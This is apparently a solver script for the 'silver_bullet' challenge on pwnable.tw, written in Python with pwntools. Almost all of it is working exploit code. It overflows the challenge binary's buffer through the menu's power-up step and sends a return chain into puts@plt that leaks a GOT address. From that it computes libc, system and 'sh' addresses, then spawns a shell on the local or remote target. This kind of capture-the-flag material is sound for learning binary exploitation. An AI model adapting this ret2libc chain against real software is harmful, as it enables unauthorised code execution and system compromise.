from pwn import *
import sys
def create(data):
    """Select menu option 1 on the module-level tube `r` and submit `data`.

    Each prompt consumed from the peer is echoed to stdout so the session
    can be followed by eye. The menu choice is sent with a trailing newline;
    `data` itself is written verbatim with `send`, so the caller controls
    whether a newline is included.

    Relies on `r` (a pwntools tube) having been created before the call.
    """
    menu_prompt = r.recvuntil("choice :")
    print(menu_prompt)
    r.sendline("1")
    field_prompt = r.recvuntil("bullet :")
    print(field_prompt)
    r.send(data)
def power(data):
    """Select menu option 2 on the module-level tube `r` and submit `data`.

    Mirrors `create`: the "choice :" prompt is echoed, "2" is sent, then the
    "of bullet :" prompt is echoed and `data` is written verbatim via `send`
    (no newline appended).

    Relies on `r` (a pwntools tube) having been created before the call.
    """
    menu_prompt = r.recvuntil("choice :")
    print(menu_prompt)
    r.sendline("2")
    field_prompt = r.recvuntil("of bullet :")
    print(field_prompt)
    r.send(data)
def beat():
    """Select menu option 3 on the module-level tube `r`.

    Waits for the "choice :" prompt, echoes it, and answers "3". No further
    input is sent; the caller reads whatever the peer prints afterwards.
    """
    menu_prompt = r.recvuntil("choice :")
    print(menu_prompt)
    r.sendline("3")
def exit():
    """Select menu option 4 on the module-level tube `r`.

    Waits for the "choice :" prompt, echoes it, and answers "4".

    NOTE: this name shadows the builtin `exit`; kept as-is because callers
    may reference it. Not used by the script body below.
    """
    menu_prompt = r.recvuntil("choice :")
    print(menu_prompt)
    r.sendline("4")
# Pick the target from argv: an argument starting with 'l' means a local
# process (32-bit loader path forced via LD_LIBRARY_PATH), anything else
# means the remote service. Exactly one argument is expected.
if len(sys.argv) == 2:
    if sys.argv[1][0] == 'l':
        r = process("./silver_bullet", env={"LD_LIBRARY_PATH": "/lib32"})
    else:
        r = remote("chall.pwnable.tw", 10103)
else:
    # NOTE: only prints; `r` stays unbound and the first helper call below
    # will raise NameError. Behaviour preserved from the original.
    print("gg")

# Fixed addresses of the (non-PIE, 32-bit) target binary, as recorded by
# the author. They are specific to this build of the challenge.
got_stdin = 0x804b020
main_addr = 0x8048954
puts_plt = 0x80484a8

# Stage 1: the author's note describes this as returning into puts@plt
# to print a GOT entry, then back into main for a second round.
create("g" * (0x30 - 1))
power("g")
power("\xff\xff\x7f" + "a" * 4 + p32(puts_plt) + p32(main_addr) + p32(got_stdin))
beat()
beat()

# Consume the banner and dump the bytes that follow it, one hex value per line.
r.recvuntil("Oh ! You win !!\n")
leaked = r.recv(10)
for ch in leaked:
    print(hex(ord(ch)))
index = 0

# The first four leaked bytes are taken as a little-endian pointer; the
# constants below are the author's offsets for the target's libc build.
libc = u32(leaked[:4]) - 0x1b05a0
system_addr = libc + 0x3a940
sh_addr = libc + 0x158e8b
# Author's note (translated): the "sh" offset on the local libc still
# differs slightly from the remote one -- cause unclear.
print(hex(libc))
print(hex(system_addr))

# Stage 2: same input sequence as stage 1, with the computed libc addresses
# in place of the PLT/main/GOT triple, then hand the tube to the user.
create("g" * (0x30 - 1))
power("g")
power("\xff\xff\x7f" + "a" * 4 + p32(system_addr) + p32(sh_addr) + p32(sh_addr) + p32(sh_addr))
beat()
beat()
r.interactive()